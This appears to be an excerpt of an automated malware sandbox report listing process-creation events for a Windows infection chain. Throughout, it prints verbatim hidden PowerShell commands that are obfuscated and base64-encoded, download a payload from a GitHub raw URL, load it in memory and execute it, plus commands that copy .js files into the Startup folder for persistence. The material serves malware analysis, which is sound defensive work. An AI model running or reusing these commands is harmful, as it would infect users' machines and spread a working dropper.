            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
